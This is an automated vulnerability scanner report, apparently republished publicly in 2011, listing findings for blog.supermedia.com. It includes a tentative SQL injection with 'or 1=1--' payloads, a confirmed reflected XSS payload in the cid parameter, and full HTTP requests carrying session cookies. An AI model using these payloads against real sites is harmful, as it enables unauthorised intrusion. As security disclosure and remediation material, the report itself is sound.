XSS, blog.supermedia.com, SQL Injection, Cross Site Scripting

XSS, SQL Injection in blog.supermedia.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 09:35:45 CST 2011.



DORK CWE-79 XSS Report

Loading

1. SQL injection

2. Cross-site scripting (reflected)

3. Cross-domain script include

3.1. http://blog.supermedia.com/

3.2. http://blog.supermedia.com/2011/01/2011-changes/

3.3. http://blog.supermedia.com/2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/

3.4. http://blog.supermedia.com/2011/01/getting-in-shape-tips/

3.5. http://blog.supermedia.com/2011/01/how-to-use-op-ed-pages-to-promote-your-business/

3.6. http://blog.supermedia.com/2011/01/starting-a-social-enterprise/

3.7. http://blog.supermedia.com/2011/01/videos-will-help-your-small-business/

3.8. http://blog.supermedia.com/2011/02/build-brand/

3.9. http://blog.supermedia.com/2011/02/go-marketing/

3.10. http://blog.supermedia.com/2011/02/planning-appreciation-events/

3.11. http://blog.supermedia.com/2011/02/should-you-loan-money-to-employees/

3.12. http://blog.supermedia.com/archives/

3.13. http://blog.supermedia.com/archives/news/

3.14. http://blog.supermedia.com/archives/newsletters/

3.15. http://blog.supermedia.com/archives/press-releases/

3.16. http://blog.supermedia.com/archives/tips/

4. Cookie without HttpOnly flag set

4.1. http://blog.supermedia.com/

4.2. http://blog.supermedia.com/2011/01/2011-changes/

4.3. http://blog.supermedia.com/2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/

4.4. http://blog.supermedia.com/2011/01/getting-in-shape-tips/

4.5. http://blog.supermedia.com/2011/01/how-to-use-op-ed-pages-to-promote-your-business/

4.6. http://blog.supermedia.com/2011/01/starting-a-social-enterprise/

4.7. http://blog.supermedia.com/2011/01/videos-will-help-your-small-business/

4.8. http://blog.supermedia.com/2011/02/build-brand/

4.9. http://blog.supermedia.com/2011/02/go-marketing/

4.10. http://blog.supermedia.com/2011/02/planning-appreciation-events/

4.11. http://blog.supermedia.com/2011/02/should-you-loan-money-to-employees/

4.12. http://blog.supermedia.com/archives/

4.13. http://blog.supermedia.com/archives/news/

4.14. http://blog.supermedia.com/archives/newsletters/

4.15. http://blog.supermedia.com/archives/press-releases/

4.16. http://blog.supermedia.com/archives/tips/

4.17. http://blog.supermedia.com/comment_form.php

4.18. http://blog.supermedia.com/comment_html.php

4.19. http://blog.supermedia.com/favicon.ico

4.20. http://blog.supermedia.com/feed-icon-28x28.png

4.21. http://blog.supermedia.com/feed/

4.22. http://blog.supermedia.com/feed/atom/

4.23. http://blog.supermedia.com/main.css

5. HTML does not specify charset

5.1. http://blog.supermedia.com/comment_form.php

5.2. http://blog.supermedia.com/comment_html.php

6. Content type incorrectly stated



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blog.supermedia.com
Path:   /archives/tips/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 21150963'%20or%201%3d1--%20 and 21150963'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /archives/tips21150963'%20or%201%3d1--%20/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Thu, 03 Feb 2011 19:48:47 GMT
Server: Unspecified
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/

Request 2

GET /archives/tips21150963'%20or%201%3d2--%20/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response 2

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:49:06 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml" title="RSS Feed" href="/feed/" />
<link rel="alternate" type="application/atom+xml" title="Atom Feed" href="/feed/atom/" />

<link type="text/css" rel="stylesheet" href="http://www.superpages.com/inc/social/soc.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/cobrand.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/supermedia/supermedia.css">
<link rel="stylesheet" type="text/css" href="/main.css">
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/blockui.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/header.js"></script>

<meta name="decorator" content="supermedia">

<meta name="keywords" content="directory advertising options, business directory marketing options, directory options, yellow pages, business directories, Spanish yellow pages, digital directories">
<meta name="description" content="Our directories complement each other to give you an unmatched reach to every audience imaginable including companion directories, bilingual and spanish directories, business to businesss (b2b) directories and digital directories.">
<link rel="STYLESHEET" type="text/css" href="http://www.supermedia.com/spportal/style/sup
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_html.php

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 791b3</script><script>alert(1)</script>95b6769fb51 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /comment_html.php?cid=791b3</script><script>alert(1)</script>95b6769fb51 HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:38 GMT
Server: Unspecified
Content-Length: 101
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:38 GMT;path=/

<script type="text/javascript">alert("791b3</script><script>alert(1)</script>95b6769fb51");</script>

3. Cross-domain script include  previous  next
There are 16 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. http://blog.supermedia.com/  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: blog.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/social-responsibility/corporate-governance
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:38 GMT
Server: Unspecified
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:38 GMT;path=/
Cache-Control: private
Content-Length: 30628


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.2. http://blog.supermedia.com/2011/01/2011-changes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/2011-changes/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/2011-changes/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:18 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Changes to Look for in 2011 | SuperMedia Blog | SuperMedia.com</title>

<link rel="alternat
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.3. http://blog.supermedia.com/2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:26 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:26 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title> Allowing Employees to Work Remotely Could be a Win-Win for Your Business | SuperMedia Blog |
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.4. http://blog.supermedia.com/2011/01/getting-in-shape-tips/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/getting-in-shape-tips/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/getting-in-shape-tips/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:18 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>3 Tips For Getting in Shape While Running a Business | SuperMedia Blog | SuperMedia.com</titl
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.5. http://blog.supermedia.com/2011/01/how-to-use-op-ed-pages-to-promote-your-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/how-to-use-op-ed-pages-to-promote-your-business/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/how-to-use-op-ed-pages-to-promote-your-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:16 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:16 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>How to Use Op-Ed Pages to Promote Your Business | SuperMedia Blog | SuperMedia.com</title>

...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.6. http://blog.supermedia.com/2011/01/starting-a-social-enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/starting-a-social-enterprise/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/starting-a-social-enterprise/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:28 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:28 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Starting A Social Enterprise | SuperMedia Blog | SuperMedia.com</title>

<link rel="alterna
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.7. http://blog.supermedia.com/2011/01/videos-will-help-your-small-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/videos-will-help-your-small-business/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/videos-will-help-your-small-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:17 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:17 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>How Videos Will Help Your Small Business | SuperMedia Blog | SuperMedia.com</title>

<link
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.8. http://blog.supermedia.com/2011/02/build-brand/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/build-brand/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/02/build-brand/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Upping Your Brand in 2011 | SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.9. http://blog.supermedia.com/2011/02/go-marketing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/go-marketing/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/02/go-marketing/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Go Guerrilla with Your Marketing | SuperMedia Blog | SuperMedia.com</title>

<link rel="alt
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.10. http://blog.supermedia.com/2011/02/planning-appreciation-events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/planning-appreciation-events/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/02/planning-appreciation-events/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Planning Appreciation Events | SuperMedia Blog | SuperMedia.com</title>

<link rel="alterna
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.11. http://blog.supermedia.com/2011/02/should-you-loan-money-to-employees/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/should-you-loan-money-to-employees/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/02/should-you-loan-money-to-employees/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Should You Loan Money to Your Employees? | SuperMedia Blog | SuperMedia.com</title>

<link
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.12. http://blog.supermedia.com/archives/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:30 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:30 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

3.13. http://blog.supermedia.com/archives/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/news/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/news/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:31 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:31 GMT;path=/


